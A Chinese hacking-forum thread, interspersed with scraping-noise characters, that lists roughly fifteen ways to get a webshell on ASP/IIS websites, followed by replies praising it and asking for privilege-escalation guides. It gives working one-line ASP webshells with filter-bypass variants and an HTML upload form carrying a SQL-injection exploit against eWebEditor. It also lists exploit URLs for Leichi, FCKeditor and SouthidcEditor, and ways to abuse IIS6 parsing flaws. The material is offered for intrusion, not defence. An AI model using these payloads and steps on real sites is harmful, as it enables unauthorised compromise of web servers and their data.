返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
5 d! M& A( d' W1 d+ [5 `8 F7 d: j: M" n4 P) l1 \  A
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp8 K  z8 p: r. y+ \6 \3 ?3 ?

7 z5 Y* p9 z. R% O3.上传漏洞) O8 v9 o' e, V3 ~
) h8 |0 b* b7 r5 p3 t& H
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00- ], E- W9 x! T# W9 q0 k- e

) b3 Y, H  n# U7 V4 P逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件! b9 K* \& s! L/ P
% k  r- l/ V. x& t  O( G
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp& V8 g2 D% W  q, ]' P7 n
然后在上传文件里面填要传的图片格式的ASP木马+ G7 q3 R, L3 r5 }$ e/ O
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp+ ^1 F) p* ]$ H7 L! \
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
" e  ~0 O, }$ O% M8 D- M! X. f7 C8 z# l( I) r, E$ R
<html>
+ Y( a' n! B5 e: ^5 o4 H<head>* k4 l& \+ l# D* E5 g
<title>ewebeditor upload.asp上传利用</title>( D' c/ `, I1 F
</head>
6 ?( {' D8 Q7 r<body>
5 @! J7 _4 z$ U' k<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
6 C& [% F4 u; M! Z& [" n/ v8 Y. R$ n<input type=file name=uploadfile size=100><br><br>
  N% I; C" \$ y- {<input type=submit value=Fuck>1 P; Z- ]2 p* e
</form>4 s& }" ^- w% q. C
</body>9 ^1 u/ Y$ z# @; D
</form>
2 M8 T8 Z) I1 n" F; d  l2 @& B0 S</html>6 B. D7 y3 W2 o  M: c

" r7 K& h0 a& `7 B2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问" z1 x$ g) S8 z
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp1 G7 y) g+ t2 P4 i

9 {; \0 }) `' @: m利用windows2003解析。建立zjq.asp的文件夹' W$ V/ F4 E. ]( R

1 t3 P* f3 q0 P) z& F6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
, I: `& H5 Q. _/ ]( N; z& _7 u8 P; l  A& f  t
7.cuteeditor:类似ewebeditor
* q+ a% b$ n$ D" h( a( c) J- Z2 ?+ ]8 V. U) {" ]+ V4 d
8.htmleditor:同上  X4 `/ ]1 ?( _8 F- U5 n; q% f
+ @# c& E! G4 n3 u; a
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破0 v0 B2 |$ L! Z, i3 m1 ]
6 `8 p" t" G& \; |
<%execute request("value")%><%'<% loop <%:%>
' X2 e) b/ U: t' x
- d* u0 M. T+ g5 _+ k& h<%'<% loop <%:%><%execute request("value")%>
; W  }; @9 f+ x3 e. h3 m3 s% n) F
<%execute request("value")'<% loop <%:%>
9 P( U, \5 D' t, @8 C9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞% I4 y  X* \) i0 `0 r
7 K0 p5 K' b3 d  Y" f! u% n
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞1 S6 I' H1 @# L. _' E

$ i# ^, b9 H" r5 T8 U: h11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3! T7 k: e4 O0 u2 V1 O. i" b( S
) S# [$ t' c* Y
解析漏洞得到webshell
  `5 A$ u. u% n' b0 W+ K. n, A% X: ]/ h$ K7 ?4 y5 s
12.mssql差异备份,日志备份,前提需知道web路径
+ |4 a/ ^5 B9 ^1 V& [6 b0 D, Z0 Z: j8 D
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell. t9 _7 ~7 W0 @2 j2 P! O
& l* L( z4 `# E
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell; l- p* O1 @8 s" y" s

6 o) L( h4 v* n& B6 S* x15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
$ ^3 F( [2 Q6 J% D& Z* O. C( r4 z: p% V% ]
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
' z7 ?- p- l' Z不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
' N" D& o# m) P1 P3 d( y" y, }( ~5 X5 |- V
  M5 x% q8 u& z+ m  f2 J& G
很好啊、基本的入侵方法都包含了5 K9 y% t( Q1 C7 l/ t, D4 e

1 M' {0 I! s$ C2 z% T  \最好来个提权的帖子再。
; v% z! d3 O: A$ o$ {5 d! C
: _/ V: x9 v' W3 H不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表